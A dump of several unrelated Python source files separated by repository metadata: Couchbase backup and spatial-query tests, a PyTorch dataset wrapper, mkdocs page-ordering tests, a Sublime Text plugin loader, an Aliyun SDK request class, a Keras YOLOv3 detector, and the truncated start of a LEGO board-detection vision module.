template = '{{ "mutated" : {0}, "age": {0}, "first_name": "{1}" }}'
gen_update = DocumentGenerator('load_by_id_test', template, list(range(5)),\
['james', 'john'], start=0, end=self.num_items)
self._load_all_buckets(self.master, gen_update, "update", 0, 1,\
self.item_flag, True, batch_size=20000,\
pause_secs=5, timeout_secs=180)
self._wait_for_stats_all_buckets(self.servers[:self.num_servers])
#Take a backup
self.shell.execute_cluster_backup(self.couchbase_login_info,\
self.backup_location, options)
# Save copy of data
kvs_before = {}
for bucket in self.buckets:
kvs_before[bucket.name] = bucket.kvs[1]
bucket_names = [bucket.name for bucket in self.buckets]
# Delete all buckets
self._all_buckets_delete(self.master)
gc.collect()
self._bucket_creation()
self.sleep(20)
self.restoreAndVerify(bucket_names, kvs_before)
class IBRSpatialTests(SpatialQueryTests):
def setUp(self):
self.input = TestInputSingleton.input
self.servers = self.input.servers
self.master = self.servers[0]
self.log = logger.Logger.get_logger()
self.helper = SpatialHelper(self, "default")
self.helper.setup_cluster()
self.cluster = Cluster()
self.default_bucket = self.input.param("default_bucket", True)
self.sasl_buckets = self.input.param("sasl_buckets", 0)
self.standard_buckets = self.input.param("standard_buckets", 0)
self.memcached_buckets = self.input.param("memcached_buckets", 0)
self.servers = self.helper.servers
self.shell = RemoteMachineShellConnection(self.master)
info = self.shell.extract_remote_info()
self.os = info.type.lower()
self.couchbase_login_info = "%s:%s" % (self.input.membase_settings.rest_username,
self.input.membase_settings.rest_password)
self.backup_location = self.input.param("backup_location", "/tmp/backup")
self.command_options = self.input.param("command_options", '')
def tearDown(self):
self.helper.cleanup_cluster()
def test_backup_with_spatial_data(self):
num_docs = self.helper.input.param("num-docs", 5000)
self.log.info("description : Make limit queries on a simple "
"dataset with {0} docs".format(num_docs))
data_set = SimpleDataSet(self.helper, num_docs)
data_set.add_limit_queries()
self._query_test_init(data_set)
if not self.command_options:
self.command_options = []
options = self.command_options + [' -m full']
self.total_backups = 1
self.shell.execute_cluster_backup(self.couchbase_login_info, self.backup_location, options)
time.sleep(2)
self.buckets = RestConnection(self.master).get_buckets()
bucket_names = [bucket.name for bucket in self.buckets]
BucketOperationHelper.delete_all_buckets_or_assert(self.servers, self)
gc.collect()
self.helper._create_default_bucket()
self.shell.restore_backupFile(self.couchbase_login_info, self.backup_location, bucket_names)
SimpleDataSet(self.helper, num_docs)._create_views()
self._query_test_init(data_set)
| 45.528391
| 165
| 0.626988
|
d62050555f82deb3266bfe8e0e3782aaa6ad706f
| 500
|
py
|
Python
|
util/dataset_util.py
|
HaveTwoBrush/chatbot
|
5532604c810e3e0cb94eb53eecfb07ac9e286ea5
|
[
"Apache-2.0"
] | 29
|
2019-01-15T02:06:55.000Z
|
2019-11-03T13:39:36.000Z
|
util/dataset_util.py
|
kinggreenhall/chatbot
|
5532604c810e3e0cb94eb53eecfb07ac9e286ea5
|
[
"Apache-2.0"
] | 1
|
2019-05-01T06:30:41.000Z
|
2019-05-03T13:59:20.000Z
|
util/dataset_util.py
|
kinggreenhall/chatbot
|
5532604c810e3e0cb94eb53eecfb07ac9e286ea5
|
[
"Apache-2.0"
] | 5
|
2019-03-27T08:44:07.000Z
|
2019-11-05T15:49:50.000Z
|
from torch.utils.data import Dataset
import numpy as np
from util.data_util import DataUtil
class DatasetUtil(Dataset):
def __init__(self, conf):
self.data_util = DataUtil(conf)
self.input_list, self.target_list, self.intent_list = self.data_util.get_train_data()
def __getitem__(self, index):
return np.array(self.input_list[index]), np.array(self.target_list[index]), np.array(self.intent_list[index])
def __len__(self):
return len(self.input_list)
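# Editor's note, a minimal usage sketch (the `conf` object is assumed to come
# from the surrounding project's configuration):
#
#   from torch.utils.data import DataLoader
#   dataset = DatasetUtil(conf)
#   loader = DataLoader(dataset, batch_size=32, shuffle=True)
#   for inputs, targets, intents in loader:
#       pass  # each batch is collated from the numpy arrays returned above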
| 29.411765
| 117
| 0.722
|
344b9d54c7f9db672d083ac4f06351543535735f
| 3,575
|
py
|
Python
|
mkdocs_awesome_pages_plugin/tests/e2e/test_order.py
|
marcovoc/mkdocs-awesome-pages-plugin
|
8b489024c1a545fead6e7338fffb29b98c657bdc
|
[
"MIT"
] | null | null | null |
mkdocs_awesome_pages_plugin/tests/e2e/test_order.py
|
marcovoc/mkdocs-awesome-pages-plugin
|
8b489024c1a545fead6e7338fffb29b98c657bdc
|
[
"MIT"
] | null | null | null |
mkdocs_awesome_pages_plugin/tests/e2e/test_order.py
|
marcovoc/mkdocs-awesome-pages-plugin
|
8b489024c1a545fead6e7338fffb29b98c657bdc
|
[
"MIT"
] | null | null | null |
from .base import E2ETestCase
class TestOrder(E2ETestCase):
def test_asc(self):
navigation = self.mkdocs(
self.config,
[
"1.md",
"3.md",
("2", ["1.md", "2.md", self.pagesFile(order="asc")]),
self.pagesFile(order="asc"),
],
)
self.assertEqual(
navigation,
[("1", "/1"), ("2", [("1", "/2/1"), ("2", "/2/2")]), ("3", "/3")],
)
def test_desc(self):
navigation = self.mkdocs(
self.config,
[
"1.md",
"3.md",
("2", ["1.md", "2.md", self.pagesFile(order="desc")]),
self.pagesFile(order="desc"),
],
)
self.assertEqual(
navigation,
[("3", "/3"), ("2", [("2", "/2/2"), ("1", "/2/1")]), ("1", "/1")],
)
def test_nav_asc(self):
navigation = self.mkdocs(
self.config,
[
"1.md",
"3.md",
(
"2",
["1.md", "2.md", self.pagesFile(order="asc", nav=["2.md", "1.md"])],
),
self.pagesFile(order="asc", nav=["2", "1.md", "3.md"]),
],
)
self.assertEqual(
navigation,
[("2", [("2", "/2/2"), ("1", "/2/1")]), ("1", "/1"), ("3", "/3")],
)
def test_nav_desc(self):
navigation = self.mkdocs(
self.config,
[
"1.md",
"3.md",
(
"2",
[
"1.md",
"2.md",
self.pagesFile(order="desc", nav=["2.md", "1.md"]),
],
),
self.pagesFile(order="desc", nav=["2", "1.md", "3.md"]),
],
)
self.assertEqual(
navigation,
[("2", [("2", "/2/2"), ("1", "/2/1")]), ("1", "/1"), ("3", "/3")],
)
def test_nav_rest_asc(self):
navigation = self.mkdocs(
self.config,
[
"1.md",
"3.md",
(
"2",
[
"1.md",
"2.md",
"3.md",
self.pagesFile(order="asc", nav=["3.md", "..."]),
],
),
self.pagesFile(order="asc", nav=["3.md", "..."]),
],
)
self.assertEqual(
navigation,
[
("3", "/3"),
("1", "/1"),
("2", [("3", "/2/3"), ("1", "/2/1"), ("2", "/2/2")]),
],
)
def test_nav_rest_desc(self):
navigation = self.mkdocs(
self.config,
[
"1.md",
"3.md",
(
"2",
[
"1.md",
"2.md",
"3.md",
self.pagesFile(order="desc", nav=["1.md", "..."]),
],
),
self.pagesFile(order="desc", nav=["1.md", "..."]),
],
)
self.assertEqual(
navigation,
[
("1", "/1"),
("3", "/3"),
("2", [("1", "/2/1"), ("3", "/2/3"), ("2", "/2/2")]),
],
)
| 26.679104
| 88
| 0.272727
|
a7c11d7903fe334596362791ad0ba48ed9e33119
| 3,309
|
py
|
Python
|
main.py
|
k5md/Terminus
|
101c8d439cf98cc56829cc72e4f8dd9f7773e4e5
|
[
"MIT"
] | null | null | null |
main.py
|
k5md/Terminus
|
101c8d439cf98cc56829cc72e4f8dd9f7773e4e5
|
[
"MIT"
] | null | null | null |
main.py
|
k5md/Terminus
|
101c8d439cf98cc56829cc72e4f8dd9f7773e4e5
|
[
"MIT"
] | null | null | null |
import sublime
import sys
import logging
try:
from .terminus.commands import (
TerminusCommandsEventListener,
TerminusOpenCommand,
TerminusCloseCommand,
TerminusCloseAllCommand,
TerminusViewEventListener,
TerminusInitializeCommand,
TerminusActivateCommand,
TerminusClearHistoryCommand,
TerminusMaximizeCommand,
TerminusMinimizeCommand,
TerminusRenderCommand,
TerminusKeypressCommand,
TerminusCopyCommand,
TerminusPasteCommand,
TerminusPasteFromHistoryCommand,
TerminusDeleteWordCommand,
ToggleTerminusPanelCommand,
TerminusSendStringCommand,
TerminusShowCursor,
TerminusInsertCommand
)
from .terminus.edit_settings import (
TerminusEditSettingsListener,
TerminusEditSettingsCommand
)
from .terminus.mouse import (
TerminusMouseEventListener,
TerminusOpenContextUrlCommand,
TerminusClickCommand,
TerminusOpenImageCommand
)
from .terminus.query import TerminusQueryContextListener
from .terminus.theme import (
TerminusSelectThemeCommand,
TerminusGenerateThemeCommand,
plugin_loaded as theme_plugin_loaded,
plugin_unloaded as theme_plugin_unloaded
)
from .terminus.utils import settings_on_change
except ImportError:
pass
__all__ = [
"TerminusCommandsEventListener", "TerminusOpenCommand", "TerminusCloseCommand",
"TerminusCloseAllCommand",
"TerminusViewEventListener", "TerminusInitializeCommand", "TerminusActivateCommand",
"TerminusClearHistoryCommand", "TerminusMaximizeCommand", "TerminusMinimizeCommand",
"TerminusRenderCommand", "TerminusKeypressCommand", "TerminusCopyCommand",
"TerminusPasteCommand", "TerminusShowCursor", "TerminusInsertCommand",
"TerminusPasteFromHistoryCommand", "TerminusDeleteWordCommand", "ToggleTerminusPanelCommand",
"TerminusSendStringCommand",
"TerminusSelectThemeCommand", "TerminusGenerateThemeCommand",
"TerminusEditSettingsListener", "TerminusEditSettingsCommand",
"TerminusMouseEventListener", "TerminusOpenContextUrlCommand", "TerminusClickCommand",
"TerminusOpenImageCommand",
"TerminusQueryContextListener"
]
logger = logging.getLogger('Terminus')
def plugin_loaded():
try:
from package_control import events
if events.post_upgrade(__package__):
from .tools.reloader import reload_package
reload_package(__package__)
except ImportError:
pass
theme_plugin_loaded()
if not logger.hasHandlers():
ch = logging.StreamHandler(sys.stdout)
logger.addHandler(ch)
settings = sublime.load_settings("Terminus.sublime-settings")
def on_change(debug):
if debug:
logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.WARNING)
on_change(settings.get("debug", False))
settings_on_change(settings, "debug")(on_change)
def plugin_unloaded():
# close all terminals
for w in sublime.windows():
w.run_command("terminus_close_all")
theme_plugin_unloaded()
settings = sublime.load_settings("Terminus.sublime-settings")
settings_on_change(settings, "debug", clear=True)
| 31.514286
| 97
| 0.723179
|
142e61c3bbb6d8a056fec96649fa1fbd7d3b4e5f
| 1,668
|
py
|
Python
|
aliyun-python-sdk-cloudauth/aliyunsdkcloudauth/request/v20180504/GetMaterialsRequest.py
|
DataDog/aliyun-openapi-python-sdk
|
5cbee29bce6416dd62f61f0c3786b1af6ea0d84f
|
[
"Apache-2.0"
] | null | null | null |
aliyun-python-sdk-cloudauth/aliyunsdkcloudauth/request/v20180504/GetMaterialsRequest.py
|
DataDog/aliyun-openapi-python-sdk
|
5cbee29bce6416dd62f61f0c3786b1af6ea0d84f
|
[
"Apache-2.0"
] | null | null | null |
aliyun-python-sdk-cloudauth/aliyunsdkcloudauth/request/v20180504/GetMaterialsRequest.py
|
DataDog/aliyun-openapi-python-sdk
|
5cbee29bce6416dd62f61f0c3786b1af6ea0d84f
|
[
"Apache-2.0"
] | 1
|
2021-02-23T11:27:54.000Z
|
2021-02-23T11:27:54.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
class GetMaterialsRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Cloudauth', '2018-05-04', 'GetMaterials','cloudauth')
self.set_protocol_type('https');
def get_ResourceOwnerId(self):
return self.get_query_params().get('ResourceOwnerId')
def set_ResourceOwnerId(self,ResourceOwnerId):
self.add_query_param('ResourceOwnerId',ResourceOwnerId)
def get_Biz(self):
return self.get_query_params().get('Biz')
def set_Biz(self,Biz):
self.add_query_param('Biz',Biz)
def get_SourceIp(self):
return self.get_query_params().get('SourceIp')
def set_SourceIp(self,SourceIp):
self.add_query_param('SourceIp',SourceIp)
def get_TicketId(self):
return self.get_query_params().get('TicketId')
def set_TicketId(self,TicketId):
self.add_query_param('TicketId',TicketId)
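# Illustrative sketch (editor's note, not part of the original file): sending
# this request through the core client; credentials and region are placeholders.
#
#   from aliyunsdkcore.client import AcsClient
#   client = AcsClient('<access-key-id>', '<access-key-secret>', 'cn-hangzhou')
#   request = GetMaterialsRequest()
#   request.set_Biz('<biz>')
#   request.set_TicketId('<ticket-id>')
#   response = client.do_action_with_exception(request)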
| 34.040816
| 83
| 0.758993
|
b8f0bb8060ab25aa487d9619535fba08b785d434
| 3,103
|
py
|
Python
|
programs/gen_buck_info.py
|
isfaaghyth/buck
|
cad8f7ac2de2c9a4f08ce66180db677e44d61aee
|
[
"Apache-2.0"
] | 2
|
2019-09-22T05:33:37.000Z
|
2019-09-22T06:36:24.000Z
|
programs/gen_buck_info.py
|
isfaaghyth/buck
|
cad8f7ac2de2c9a4f08ce66180db677e44d61aee
|
[
"Apache-2.0"
] | 1
|
2019-10-22T21:07:17.000Z
|
2019-10-22T21:07:17.000Z
|
programs/gen_buck_info.py
|
isfaaghyth/buck
|
cad8f7ac2de2c9a4f08ce66180db677e44d61aee
|
[
"Apache-2.0"
] | 1
|
2019-10-22T20:43:48.000Z
|
2019-10-22T20:43:48.000Z
|
# Copyright 2018-present Facebook, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import argparse
import errno
import json
import os
import sys
import time
import buck_version
import java_version
def main(argv):
parser = argparse.ArgumentParser()
parser.add_argument("--release-version", help="The buck release version")
parser.add_argument(
"--release-timestamp", help="The unix timestamp when the release happened"
)
parser.add_argument(
"--java-version",
help="The Java version buck was compiled against",
required=True,
)
args = parser.parse_args(argv[1:])
if bool(args.release_version) != bool(args.release_timestamp):
print(
"--release-version and --release-timestamp must either both be "
"set, or neither can be set"
)
sys.exit(1)
# Locate the root of the buck repo. We'll need to be there to
# generate the buck version UID.
path = os.getcwd()
while not os.path.exists(os.path.join(path, ".buckconfig")):
path = os.path.dirname(path)
if args.release_version:
version = args.release_version
timestamp = args.release_timestamp
dirty = False
elif os.path.exists(os.path.join(path, ".git")):
# Attempt to create a "clean" version, but fall back to a "dirty"
# one if need be.
version = buck_version.get_clean_buck_version(path)
timestamp = -1
if version is None:
version = buck_version.get_dirty_buck_version(path)
else:
timestamp = buck_version.get_git_revision_timestamp(path)
dirty = buck_version.is_dirty(path)
else:
# We're building outside a git repo. Check for the special
# .buckrelease file created by the release process.
try:
with open(os.path.join(path, ".buckrelease")) as f:
timestamp = int(os.fstat(f.fileno()).st_mtime)
version = f.read().strip()
except IOError as e:
if e.errno == errno.ENOENT:
# No .buckrelease file. Do the best that we can.
version = "(unknown version)"
timestamp = int(time.time())
else:
raise e
dirty = False
json.dump(
{
"version": version,
"timestamp": timestamp,
"is_dirty": dirty,
"java_version": java_version.get_java_major_version(args.java_version),
},
sys.stdout,
sort_keys=True,
indent=2,
)
if __name__ == "__main__":
    sys.exit(main(sys.argv))
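# Editor's note, example invocation (illustrative; the output path is a
# placeholder): the script prints the JSON blob to stdout, so a typical call is
#   python programs/gen_buck_info.py --java-version "11.0.2" > buck_build_info.json
# Without --release-version/--release-timestamp the version is derived from the
# enclosing git repo, or from the .buckrelease file when built outside git.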
| 32.663158
| 83
| 0.629069
|
ea48941b0ed9c3c646bb83ca108aa7b8cb7e30c8
| 8,791
|
py
|
Python
|
yolo.py
|
chenqianqianxiaoxiannv/yolo
|
0fa5025490b841cb1a2fd1b6188fb410ed4b2d1e
|
[
"MIT"
] | null | null | null |
yolo.py
|
chenqianqianxiaoxiannv/yolo
|
0fa5025490b841cb1a2fd1b6188fb410ed4b2d1e
|
[
"MIT"
] | null | null | null |
yolo.py
|
chenqianqianxiaoxiannv/yolo
|
0fa5025490b841cb1a2fd1b6188fb410ed4b2d1e
|
[
"MIT"
] | 1
|
2019-12-12T12:03:10.000Z
|
2019-12-12T12:03:10.000Z
|
# -*- coding: utf-8 -*-
"""
Class definition of YOLO_v3 style detection model on image and video
"""
import colorsys
import os
from timeit import default_timer as timer
import numpy as np
from keras import backend as K
from keras.models import load_model
from keras.layers import Input
from PIL import Image, ImageFont, ImageDraw
from yolo3.model import yolo_eval, yolo_body, tiny_yolo_body
from yolo3.utils import letterbox_image
import os
from keras.utils import multi_gpu_model
class YOLO(object):
_defaults = {
"model_path": 'model_data/yolo.h5',
"anchors_path": 'model_data/yolo_anchors.txt',
"classes_path": 'model_data/coco_classes.txt',
"score" : 0.3,
"iou" : 0.45,
"model_image_size" : (416, 416),
"gpu_num" : 1,
}
    @classmethod  # class-level accessor for the default config
def get_defaults(cls, n):
if n in cls._defaults:
return cls._defaults[n]
else:
return "Unrecognized attribute name '" + n + "'"
def __init__(self, **kwargs):
self.__dict__.update(self._defaults) # set up default values
        self.__dict__.update(kwargs) # and update with user overrides
self.class_names = self._get_class()
self.anchors = self._get_anchors()
self.sess = K.get_session()
self.boxes, self.scores, self.classes = self.generate()
    def _get_class(self):  # read the class names from coco_classes.txt, strip whitespace and return them
classes_path = os.path.expanduser(self.classes_path)
with open(classes_path) as f:
class_names = f.readlines()
class_names = [c.strip() for c in class_names]
return class_names
    def _get_anchors(self):  # read yolo_anchors.txt, split on ',' and return the anchors as an Nx2 numpy array
anchors_path = os.path.expanduser(self.anchors_path)
with open(anchors_path) as f:
anchors = f.readline()
anchors = [float(x) for x in anchors.split(',')]
return np.array(anchors).reshape(-1, 2)
def generate(self):
        model_path = os.path.expanduser(self.model_path)  # i.e. yolo.h5
assert model_path.endswith('.h5'), 'Keras model or weights must be a .h5 file.'
        # Load model, or construct model and load weights.
        num_anchors = len(self.anchors)  # number of anchor rows
        num_classes = len(self.class_names)  # number of classes
is_tiny_version = num_anchors==6 # default setting
try:
            self.yolo_model = load_model(model_path, compile=False)  # load the model
except:
self.yolo_model = tiny_yolo_body(Input(shape=(None,None,3)), num_anchors//2, num_classes) \
if is_tiny_version else yolo_body(Input(shape=(None,None,3)), num_anchors//3, num_classes)
            self.yolo_model.load_weights(self.model_path) # make sure model, anchors and classes match
else:
assert self.yolo_model.layers[-1].output_shape[-1] == \
num_anchors/len(self.yolo_model.output) * (num_classes + 5), \
'Mismatch between model and given anchor and class sizes'
print('{} model, anchors, and classes loaded.'.format(model_path))
# Generate colors for drawing bounding boxes.
hsv_tuples = [(x / len(self.class_names), 1., 1.)
for x in range(len(self.class_names))]
self.colors = list(map(lambda x: colorsys.hsv_to_rgb(*x), hsv_tuples))
self.colors = list(
map(lambda x: (int(x[0] * 255), int(x[1] * 255), int(x[2] * 255)),
self.colors))
        np.random.seed(10101)  # Fixed seed for consistent colors across runs.
        np.random.shuffle(self.colors)  # Shuffle colors to decorrelate adjacent classes.
        np.random.seed(None)  # Reset seed to default.
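        # Editor's note, illustrative example: with 3 classes the hues are
        # 0, 1/3 and 2/3, so
        #   colorsys.hsv_to_rgb(0.0, 1., 1.)  -> (1.0, 0.0, 0.0) -> (255, 0, 0)
        #   colorsys.hsv_to_rgb(1/3, 1., 1.)  -> (0.0, 1.0, 0.0) -> (0, 255, 0)
        #   colorsys.hsv_to_rgb(2/3, 1., 1.)  -> (0.0, 0.0, 1.0) -> (0, 0, 255)
        # and the shuffle above then decorrelates neighbouring class colours.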
        # Generate output tensor targets for filtered bounding boxes.
self.input_image_shape = K.placeholder(shape=(2, ))
if self.gpu_num>=2:
            self.yolo_model = multi_gpu_model(self.yolo_model, gpus=self.gpu_num)  # run the model on multiple GPUs
boxes, scores, classes = yolo_eval(self.yolo_model.output, self.anchors,
len(self.class_names), self.input_image_shape,
score_threshold=self.score, iou_threshold=self.iou)
return boxes, scores, classes
def detect_image(self, image):
start = timer()
if self.model_image_size != (None, None):
assert self.model_image_size[0]%32 == 0, 'Multiples of 32 required'
assert self.model_image_size[1]%32 == 0, 'Multiples of 32 required'
            boxed_image = letterbox_image(image, tuple(reversed(self.model_image_size)))  # resize the image to the model input size
else:
new_image_size = (image.width - (image.width % 32),
image.height - (image.height % 32))
boxed_image = letterbox_image(image, new_image_size)
image_data = np.array(boxed_image, dtype='float32')
print(image_data.shape)
image_data /= 255.
image_data = np.expand_dims(image_data, 0) # Add batch dimension.
out_boxes, out_scores, out_classes = self.sess.run(
[self.boxes, self.scores, self.classes],
feed_dict={
self.yolo_model.input: image_data,
self.input_image_shape: [image.size[1], image.size[0]],
K.learning_phase(): 0
})
# #######
print('Found {} boxes for {}'.format(len(out_boxes), 'img'))
font = ImageFont.truetype(font='font/FiraMono-Medium.otf',
size=np.floor(3e-2 * image.size[1] + 0.5).astype('int32'))
thickness = (image.size[0] + image.size[1]) // 300
for i, c in reversed(list(enumerate(out_classes))):
predicted_class = self.class_names[c]
box = out_boxes[i]
score = out_scores[i]
label = '{} {:.2f}'.format(predicted_class, score)
draw = ImageDraw.Draw(image)
label_size = draw.textsize(label, font)
top, left, bottom, right = box
top = max(0, np.floor(top + 0.5).astype('int32'))
left = max(0, np.floor(left + 0.5).astype('int32'))
bottom = min(image.size[1], np.floor(bottom + 0.5).astype('int32'))
right = min(image.size[0], np.floor(right + 0.5).astype('int32'))
print(label, (left, top), (right, bottom))
if top - label_size[1] >= 0:
text_origin = np.array([left, top - label_size[1]])
else:
text_origin = np.array([left, top + 1])
            # My kingdom for a good redistributable image drawing library.
for i in range(thickness):
draw.rectangle(
[left + i, top + i, right - i, bottom - i],
outline=self.colors[c])
draw.rectangle(
[tuple(text_origin), tuple(text_origin + label_size)],
fill=self.colors[c])
draw.text(text_origin, label, fill=(0, 0, 0), font=font)
del draw
end = timer()
print(end - start)
return image
def close_session(self):
self.sess.close()
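# Editor's note, a minimal usage sketch (not in the original file; the image
# path is a placeholder and the model/anchor/class paths fall back to _defaults):
#
#   from PIL import Image
#   yolo = YOLO()
#   annotated = yolo.detect_image(Image.open('example.jpg'))
#   annotated.show()
#   yolo.close_session()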
def detect_video(yolo, video_path, output_path=""):
import cv2
vid = cv2.VideoCapture(0)
if not vid.isOpened():
raise IOError("Couldn't open webcam or video")
video_FourCC = int(vid.get(cv2.CAP_PROP_FOURCC))
video_fps = vid.get(cv2.CAP_PROP_FPS)
video_size = (int(vid.get(cv2.CAP_PROP_FRAME_WIDTH)),
int(vid.get(cv2.CAP_PROP_FRAME_HEIGHT)))
isOutput = True if output_path != "" else False
if isOutput:
print("!!! TYPE:", type(output_path), type(video_FourCC), type(video_fps), type(video_size))
out = cv2.VideoWriter(output_path, video_FourCC, video_fps, video_size)
accum_time = 0
curr_fps = 0
fps = "FPS: ??"
prev_time = timer()
while True:
return_value, frame = vid.read()
image = Image.fromarray(frame)
image = yolo.detect_image(image)
result = np.asarray(image)
curr_time = timer()
exec_time = curr_time - prev_time
prev_time = curr_time
accum_time = accum_time + exec_time
curr_fps = curr_fps + 1
if accum_time > 1:
accum_time = accum_time - 1
fps = "FPS: " + str(curr_fps)
curr_fps = 0
cv2.putText(result, text=fps, org=(3, 15), fontFace=cv2.FONT_HERSHEY_SIMPLEX,
fontScale=0.50, color=(255, 0, 0), thickness=2)
cv2.namedWindow("result", cv2.WINDOW_NORMAL)
cv2.imshow("result", result)
if isOutput:
out.write(result)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
yolo.close_session()
| 41.079439
| 112
| 0.607098
|
626b61ef79ec3041be73a1d9a0d81a9605515777
| 82,175
|
py
|
Python
|
gabriel_lego/cv/lego_cv.py
|
molguin92/gabriel-lego-py3
|
2f8828326ca025997687a19d1af80bc1590a9290
|
[
"Apache-2.0"
] | null | null | null |
gabriel_lego/cv/lego_cv.py
|
molguin92/gabriel-lego-py3
|
2f8828326ca025997687a19d1af80bc1590a9290
|
[
"Apache-2.0"
] | null | null | null |
gabriel_lego/cv/lego_cv.py
|
molguin92/gabriel-lego-py3
|
2f8828326ca025997687a19d1af80bc1590a9290
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
#
# Cloudlet Infrastructure for Mobile Computing
# - Task Assistance
#
# Author: Zhuo Chen <zhuoc@cs.cmu.edu>
# Extended and ported to Python 3 by: Manuel Olguín Muñoz <molguin@kth.se>
#
# Copyright (C) 2011-2019 Carnegie Mellon University
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import annotations
import cv2
import numpy as np
from gabriel_lego.cv import bitmap as bm, zhuocv3 as zc
from gabriel_lego.cv.colors import HSVValue, LEGOColorBlue, \
LEGOColorDOBMaskBlack, LEGOColorGreen, LEGOColorRed, LEGOColorWhite, \
LEGOColorYellow, SimpleHSVColor
from gabriel_lego.lego_engine import config
# Errors
class LEGOCVError(Exception):
pass
class NoBoardDetectedError(LEGOCVError):
pass
class NoLEGODetectedError(LEGOCVError):
pass
class LowConfidenceError(LEGOCVError):
pass
################################ BASICS ########################################
def set_config(is_streaming):
config.setup(is_streaming)
def has_a_brick(mask, min_peri=None, min_area=None, min_span=None,
print_max_area=False):
contours, hierarchy = cv2.findContours(mask, mode=cv2.RETR_CCOMP,
method=cv2.CHAIN_APPROX_NONE)
max_area = 0
ret = False
for cnt_idx, cnt in enumerate(contours):
if hierarchy[0, cnt_idx, 3] != -1: # not holes
continue
if print_max_area and cv2.contourArea(cnt) > max_area:
max_area = cv2.contourArea(cnt)
if min_peri is not None and len(cnt) < min_peri:
continue
if min_area is not None and cv2.contourArea(cnt) < min_area:
continue
if min_span is not None:
max_p = cnt.max(axis=0)
min_p = cnt.min(axis=0)
diff_p = max_p - min_p
if diff_p.min() + 1 < min_span:
continue
ret = True
break
if print_max_area:
print(max_area)
return ret
################################ SHAPE #########################################
def is_line_seg_close(line1, line2):
pt1_1 = np.array(line1[0: 2])
pt1_2 = np.array(line1[2: 4])
pt2_1 = np.array(line2[0: 2])
pt2_2 = np.array(line2[2: 4])
l1 = zc.euc_dist(pt1_1, pt1_2)
l2 = zc.euc_dist(pt2_1, pt2_2)
v1 = pt1_2 - pt1_1
v2 = pt2_1 - pt1_1
v3 = pt2_2 - pt1_1
area1 = np.absolute(np.cross(v1, v2))
area2 = np.absolute(np.cross(v1, v3))
if max(area1, area2) < l1 * l2 / 3:
return True
else:
return False
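# Editor's note: the check above treats line1 as a base segment and verifies
# that both endpoints of line2 lie close to it -- the cross products
# |v1 x v2| and |v1 x v3| are parallelogram areas, and both must stay small
# relative to l1 * l2 for the segments to count as "close".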
# def is_line_seg_close2(line1, line2):
# pt1_1 = np.array(line1[0: 2])
# pt1_2 = np.array(line1[2: 4])
# pt2_1 = np.array(line2[0: 2])
# pt2_2 = np.array(line2[2: 4])
# l1 = zc.euc_dist(pt1_1, pt1_2)
# v1 = pt1_2 - pt1_1
# v2 = pt2_1 - pt1_1
# v3 = pt2_2 - pt1_1
# area1 = np.absolute(np.cross(v1, v2))
# area2 = np.absolute(np.cross(v1, v3))
# d1 = area1 * 2 / l1
# d2 = area2 * 2 / l1
# return (d1 <= 3 and d2 <= 3)
def line_intersect(a, b):
    x1, y1, x2, y2 = a[0], a[1], a[2], a[3]
    x3, y3, x4, y4 = b[0], b[1], b[2], b[3]
d = (float(x1 - x2) * float(y3 - y4)) - (float(y1 - y2) * float(x3 - x4))
if d:
x = ((x1 * y2 - y1 * x2) * (x3 - x4) - (x1 - x2) * (
x3 * y4 - y3 * x4)) / d
y = ((x1 * y2 - y1 * x2) * (y3 - y4) - (y1 - y2) * (
x3 * y4 - y3 * x4)) / d
else:
x, y = (-1, -1)
return x, y
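# Editor's note, worked example: for a = (0, 0, 2, 2) and b = (0, 2, 2, 0) the
# determinant is d = (0-2)*(2-0) - (0-2)*(0-2) = -8 and the function returns
# the expected crossing point (1.0, 1.0); parallel segments give d == 0 and
# the sentinel (-1, -1).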
def get_corner_pts(bw, perimeter=None, center=None, method='line'):
"""
Given an input image @bw where the borders of a rough rectangle are
masked, the function detects its corners
Two methods:
'line' tries to detect four lines first, and
'point' directly gets the top-left, top-right, bottom-left, bottom-right
points
    The function raises NoBoardDetectedError if it cannot find the corners
    with confidence
"""
if method == 'line':
center = (center[1], center[0]) # in (x, y) format
perimeter = int(perimeter)
lines = cv2.HoughLinesP(bw, 1, np.pi / 180, perimeter // 40,
minLineLength=perimeter // 20,
maxLineGap=perimeter // 20)
# lines = lines[0]
# HoughLines used to have a different return format which required us
# to extract the first element of a tuple to get the list of lines
# the new format returns a list of 2d-arrays so instead we iterate
# directly over the list and extract the first element of each element
# This is only for test
# img = np.zeros((bw.shape[0], bw.shape[1], 3), dtype=np.uint8)
# for line in lines:
# pt1 = (line[0], line[1])
# pt2 = (line[2], line[3])
# print (pt1, pt2)
# cv2.line(img, pt1, pt2, (255, 255, 255), 3)
# cv2.namedWindow('test')
# display_image('test', img, wait_time = config.DISPLAY_WAIT_TIME,
# resize_max = config.DISPLAY_MAX_PIXEL, save_image = config.SAVE_IMAGE)
# get four major lines
new_lines = list()
for line in lines:
line = line[0]
flag = True
for new_line in new_lines:
if is_line_seg_close(line, new_line):
flag = False
break
if flag:
new_lines.append(list(line))
if len(new_lines) != 4:
raise NoBoardDetectedError(
